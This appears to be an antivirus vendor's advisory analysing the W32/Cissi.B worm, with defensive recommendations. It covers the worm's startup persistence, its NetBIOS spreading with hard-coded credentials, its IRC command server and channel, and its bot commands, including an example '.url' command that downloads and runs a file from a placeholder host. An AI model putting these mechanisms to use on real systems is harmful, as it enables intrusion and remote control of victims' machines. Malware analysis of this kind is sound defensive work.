W32/Cissi.B!worm
Analysis
Specifics
This virus is 32 bit with a packed file size of 21,504
bytes. This virus contains code to connect with computers
across a network and also join an IRC chat server to
receive commands from a malicious user.
Loading At Windows Startup
If virus is run, it may copy itself into the Windows
folder as "penis.exe" and modify the configuration
file SYSTEM.INI to load this file as a shell application
accomplice to the common shell EXPLORER.EXE.
NetBIOS Infection Method
This virus will attempt to connect with random IP addresses
using NetBIOS - for each system found, the virus will
use a table of hard-coded logon names and passwords
to gain access to that system. If the virus is able
to log into the target, the virus will copy itself as
the file "setup.exe" to any of three hard-coded
paths -
\Documents and Settings\All Users\Start Menu\Programs\Startup\
\WINDOWS\Start Menu\Programs\Startup\
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
When the target system restarts Windows, the virus will run and start its cycle again.
IRC Server Connection Routine
The virus may attempt to connect to the IRC server uk.undernet.org
- this is also IP address 213.48.150.1. The virus will
connect using the common IRC connection TCP port 6667.
The virus will join the channel "#peniz" and
await instructions from a malicious user. Instructions
could include -
.aids
.appendfile
.closefile
.com
.createfile
.deletefile
.executefile
.exit
.hidden
.login
.logout
.nettalk
.newnick
.pingtalk
.quit
.silence
.update
.url
.visitpage
.writeline
.writetext
The instruction ".url" is used with a parameter - by passing the web site name and hosted file, the virus will use HTTP to retrieve the file and execute it. For instance, if the virus receives the instruction
.url http://a web site name/folder/a file.exe
the virus will retrieve the file using TCP port 80, then download and execute it. If the virus receives the command ".aids", the virus will exit the IRC channel and post this exit message -
"Aids infected my brain and my butt."
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- If IRC is not used in your organization, block internal
to external and external to internal access using
TCP port 6667
- If NetBIOS browsing is not used in your organization,
block internal to external and external to internal
access using TCP ports 135 and 139
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
Extreme | |
FortiAPS | |
FortiAPU | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |